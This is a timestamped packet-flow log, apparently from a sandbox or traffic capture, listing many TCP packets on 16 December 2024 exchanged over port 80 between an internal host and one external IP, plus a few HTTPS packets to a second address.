Dec 16, 2024 11:03:21.671730995 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.672712088 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.672770023 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.672818899 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.672868967 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.673878908 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.673939943 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.673976898 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.674027920 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.675122976 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.675183058 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.675229073 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.675337076 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.676186085 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.676279068 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.676323891 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.677397966 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.677433968 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.677457094 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.677473068 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.678533077 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.678569078 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.678590059 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.678611040 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.679662943 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.679699898 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.679718018 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.679742098 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.680778980 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.680830002 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.680887938 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.680942059 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.681957006 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.682010889 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.682087898 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.682138920 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.683108091 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.683207035 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.683259010 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.684247017 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.684313059 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.684355021 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.684405088 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.685444117 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.685497046 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.685556889 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.685605049 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.686542034 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.686600924 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.686650991 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.687731028 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.687803984 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.687843084 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.687886953 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.688843012 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.688939095 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.688988924 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.690001011 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.690047979 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.690139055 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.690184116 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.691196918 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.691243887 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.691329956 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.691374063 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.692323923 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.692351103 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.692372084 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.692389011 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.693454027 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.693505049 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.693557024 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.693600893 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.694637060 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.694684982 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.694726944 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.695863962 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.695915937 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.695918083 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.695964098 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.696939945 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.696989059 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.697017908 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.697068930 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.698105097 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.698203087 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.698256969 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.699244976 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.699295044 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.699347973 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.699404955 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.700392962 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.700443029 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.700489044 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.700531960 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.701572895 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.701785088 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.701836109 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.702786922 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.702847958 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.702896118 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.702939034 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.703891039 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.703949928 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.703995943 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.704039097 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.704442024 CET	443	49811	23.37.186.133	192.168.2.5
Dec 16, 2024 11:03:21.704612970 CET	49811	443	192.168.2.5	23.37.186.133
Dec 16, 2024 11:03:21.704627037 CET	443	49811	23.37.186.133	192.168.2.5
Dec 16, 2024 11:03:21.704687119 CET	49811	443	192.168.2.5	23.37.186.133
Dec 16, 2024 11:03:21.705029964 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.705111980 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.705158949 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.705339909 CET	49811	443	192.168.2.5	23.37.186.133
Dec 16, 2024 11:03:21.705411911 CET	443	49811	23.37.186.133	192.168.2.5
Dec 16, 2024 11:03:21.705456018 CET	49811	443	192.168.2.5	23.37.186.133
Dec 16, 2024 11:03:21.705472946 CET	443	49811	23.37.186.133	192.168.2.5
Dec 16, 2024 11:03:21.706193924 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.706257105 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.706296921 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.706337929 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.707341909 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.707473993 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.707525015 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.708533049 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.708633900 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.708636999 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.708679914 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.709733963 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.709799051 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.709861994 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.709909916 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.710860968 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.710917950 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.710987091 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.711035013 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.711982012 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.712030888 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.712100029 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.712146044 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.713238001 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.713293076 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.713344097 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.714304924 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.714354992 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.714421988 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.714468002 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.716772079 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.716826916 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.716841936 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.716861963 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.716872931 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.716905117 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.716932058 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.716979027 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.717822075 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.717881918 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.717942953 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.717991114 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.718955040 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.719088078 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.719141006 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.720448017 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.720510960 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.720573902 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.720623970 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.721241951 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.721297026 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.721362114 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.721409082 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.722388029 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.724839926 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.854101896 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.854129076 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.854233027 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.854480982 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.854512930 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.854541063 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.854569912 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.855187893 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.855328083 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.855380058 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.856334925 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.856384039 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.856431961 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.856478930 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.857517958 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.857569933 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.857633114 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.857686043 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.858686924 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.858767033 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.858824015 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.858874083 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.859829903 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.859884024 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.859896898 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.859930038 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.861059904 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.861123085 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.861157894 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.861205101 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.862133980 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.862195015 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.862263918 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.862488985 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.863347054 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.863471985 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.863526106 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.864458084 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.864568949 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.864602089 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.864655018 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.865631104 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.865675926 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.865741968 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.865792036 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.866866112 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.867060900 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.867114067 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.867969990 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.868022919 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.868107080 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.868155003 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.869174004 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.869210005 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.869225025 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.869255066 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.870266914 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.870320082 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.870385885 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.870435953 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.871481895 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.871517897 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.871567965 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.872548103 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.872596979 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.872648954 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.873701096 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.873749971 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.873850107 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.873895884 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.875008106 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.875041962 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.875106096 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.875999928 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.876096964 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.876149893 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.877166033 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.877274990 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.877326965 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.878309011 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.878365040 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.878417015 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.878462076 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.879515886 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.879564047 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.879606009 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.879650116 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.880656004 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.880716085 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.880769968 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.880911112 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.881794930 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.881853104 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.881912947 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.882287979 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.882929087 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.883044958 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.883100986 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.884089947 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.884136915 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.884217978 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.884260893 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.885270119 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.885371923 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.885376930 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.885413885 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.886423111 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.886476040 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.886476994 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.886526108 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.887567043 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.887666941 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.887715101 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.888725996 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.888772011 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.888828039 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.888875008 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.889854908 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.889908075 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.889909029 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.889955044 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.891066074 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.891201973 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.891249895 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.892209053 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.892298937 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.892353058 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.893352985 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.893405914 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.893448114 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.893724918 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.894490004 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.894546032 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.894558907 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.894607067 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.895760059 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.895865917 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.895900011 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.895948887 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.896795988 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.896858931 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.896903992 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.896953106 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.897984982 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.898046970 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.898091078 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.898143053 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.899113894 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.899173975 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.899233103 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.899382114 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.900278091 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.900401115 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.900468111 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.901438951 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.901608944 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.901667118 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.902580023 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.902631998 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.902721882 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.902770042 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.903731108 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.903846025 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.903883934 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.903904915 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.904876947 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.904931068 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.904933929 CET	49800	80	192.168.2.5	31.41.244.11
